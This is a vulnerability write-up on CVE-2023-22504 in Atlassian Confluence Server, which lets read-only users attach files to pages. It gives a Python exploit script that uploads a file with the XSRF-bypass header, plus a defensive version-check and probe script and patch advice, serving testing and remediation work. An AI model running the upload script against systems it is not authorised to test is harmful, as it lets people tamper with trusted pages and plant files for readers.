Atlassian Confluence Server is a widely used collaboration platform that provides a centralized environment for users to create, share, and discuss their ideas and projects. It has been reported that certain versions of the software are affected by a Broken Access Control vulnerability, allowing users with read-only permissions to upload attachments to pages they don't have write access to. In this post, we will provide a detailed analysis of this vulnerability, explain how it can be exploited, and discuss the potential impact on affected systems.

Affected Versions

The vulnerability affects Atlassian Confluence Server versions prior to 7.19.9.

Vulnerability Details

The vulnerability, officially designated as CVE-2023-22504, is a broken access control flaw in the attachment feature of Confluence: the attachment upload endpoint accepts files from a user who holds only view permission on the target page, where Confluence should require the permission to add attachments. The direct impact is to page integrity: a low-privileged user can place arbitrary files on pages that other users trust, and those files are served to readers as ordinary attachments. Any further consequence, such as delivering malicious content to the people who open the attachment, depends on what is done with the file afterwards; the advisory describes an access-control bypass, not code execution on the server itself.

Discovery

This vulnerability was discovered by Rojan Rijal, a member of the Tinder Security Engineering Team. The discovery was reported to Atlassian, prompting the release of patches and updates to address the issue.

Exploit Details

The following Python script demonstrates the vulnerability. The credentials it uses belong to an account that has only view permission on the target page; on an affected build the upload is accepted, while a patched build should reject it with a 403 response:

import os
import requests

# Change these variables according to your setup. The account must have
# read-only (view) permission on PAGE_ID; that is what makes the test meaningful.
CONFLUENCE_URL = "https://your-confluence-instance.com"
USERNAME = "your-username"
PASSWORD = "your-password"
PAGE_ID = "123"
FILE_PATH = "path/to/your/file"

# Authenticate with the Confluence REST API using basic auth. The
# X-Atlassian-Token header disables the XSRF check that the attachment
# endpoint otherwise applies to multipart POST requests.
session = requests.Session()
session.auth = (USERNAME, PASSWORD)
session.headers.update({"X-Atlassian-Token": "no-check"})

# Upload the file as a child attachment of the page. Only the base name is
# sent as the attachment filename so the local path is not leaked.
with open(FILE_PATH, "rb") as f:
    response = session.post(
        f"{CONFLUENCE_URL}/rest/api/content/{PAGE_ID}/child/attachment",
        files={"file": (os.path.basename(FILE_PATH), f)},
    )
    if response.status_code == 200:
        # Accepted: the permission check was bypassed (affected build).
        print(f"File {FILE_PATH} successfully uploaded to page {PAGE_ID}")
    else:
        # A patched build should answer 403 for a user without write access.
        print(f"Failed to upload file: {response.status_code} - {response.reason}")

Mitigation

Atlassian has addressed the vulnerability in Confluence Server version 7.19.9. Administrators are advised to update their Confluence Server installations to this version or later immediately, and to confirm the fix afterwards by repeating the upload attempt with a read-only test account, which should now be rejected. Patches can be downloaded from the official Atlassian website:

- Atlassian Confluence Server Download Page
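The following script is an added example for this post, not code from Atlassian or from the original advisory. It packages the two checks an administrator or tester wants around this issue: reading the running version out of the ajs-version-number meta tag that Confluence pages carry (an assumption; confirm the tag is present on your login page) and comparing it against the 7.19.9 fix boundary named above, and interpreting the HTTP status returned when a read-only account attempts the attachment upload from the exploit section. The version comparison implements only the boundary this post states (anything before 7.19.9 is affected); confirm the status of other release lines against Atlassian's advisory. The probe function uses only the standard library and should be run only against instances you are authorized to test.

```python
import base64
import re
import urllib.error
import urllib.request
import uuid

# Fix boundary stated in the advisory text: versions before 7.19.9 are affected.
FIXED_VERSION = (7, 19, 9)


def parse_version(version):
    """Turn '7.19.8' or '7.19.8-m01' into a comparable (major, minor, patch) tuple."""
    core = version.strip().split("-", 1)[0]
    parts = []
    for piece in core.split("."):
        match = re.match(r"\d+", piece)
        if not match:
            raise ValueError(f"unparseable version: {version!r}")
        parts.append(int(match.group()))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected_version(version):
    """True if the build predates the 7.19.9 fix named in the advisory."""
    return parse_version(version) < FIXED_VERSION


def version_from_html(html):
    """Pull the build version from the ajs-version-number meta tag.
    Assumption: the tag is present on the instance's login page HTML."""
    match = re.search(r'<meta\s+name="ajs-version-number"\s+content="([^"]+)"', html)
    if not match:
        raise ValueError("ajs-version-number meta tag not found")
    return match.group(1)


def classify_probe(status_code):
    """Interpret the status returned to a READ-ONLY user who tried to attach a file."""
    if status_code == 403:
        return "enforced"      # permission check rejected the upload: expected on patched builds
    if status_code == 200:
        return "vulnerable"    # upload accepted on a page the user cannot edit
    if status_code == 401:
        return "auth-failed"   # credentials rejected: the probe proves nothing
    return "inconclusive"      # anything else needs a look at the response body


def probe_upload(base_url, username, password, page_id, timeout=10):
    """POST a harmless text attachment as the read-only user and return the HTTP status.
    Hypothetical helper for authorized testing; it performs a real request."""
    boundary = uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="file"; filename="permission-probe.txt"\r\n'
        "Content-Type: text/plain\r\n\r\n"
        "permission probe, safe to delete\r\n"
        f"--{boundary}--\r\n"
    ).encode()
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    request = urllib.request.Request(
        f"{base_url.rstrip('/')}/rest/api/content/{page_id}/child/attachment",
        data=body,
        method="POST",
        headers={
            "Authorization": f"Basic {token}",
            "X-Atlassian-Token": "nocheck",  # same XSRF bypass header the exploit uses
            "Content-Type": f"multipart/form-data; boundary={boundary}",
        },
    )
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code


if __name__ == "__main__":
    # Offline demonstration on a constructed page fragment; no network access.
    sample_html = '<html><head><meta name="ajs-version-number" content="7.19.8"></head></html>'
    version = version_from_html(sample_html)
    print(version, "affected" if is_affected_version(version) else "fixed")
```

A 403 from the probe on a build that parse_version reports as affected is worth a second look rather than a sigh of relief: check that the test account really has view permission on the page and that the page id is right, since both mistakes also produce rejections that look like an enforced check.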

Original References

- Official CVE-2023-22504 Advisory
- Atlassian Security Advisory

Conclusion

CVE-2023-22504 is a serious security vulnerability affecting Atlassian Confluence Server, which allows users with read-only access to upload files to pages they don't have write access to. Exploiting it lets a low-privileged user alter trusted pages by attaching arbitrary content, and the files they place there can be used against the readers who open them. Administrators should update their systems to Confluence Server 7.19.9 or later and verify, with a read-only test account, that the upload is rejected after the upgrade.

Timeline

Published on: 05/25/2023 14:15:00 UTC
Last modified on: 06/01/2023 16:41:00 UTC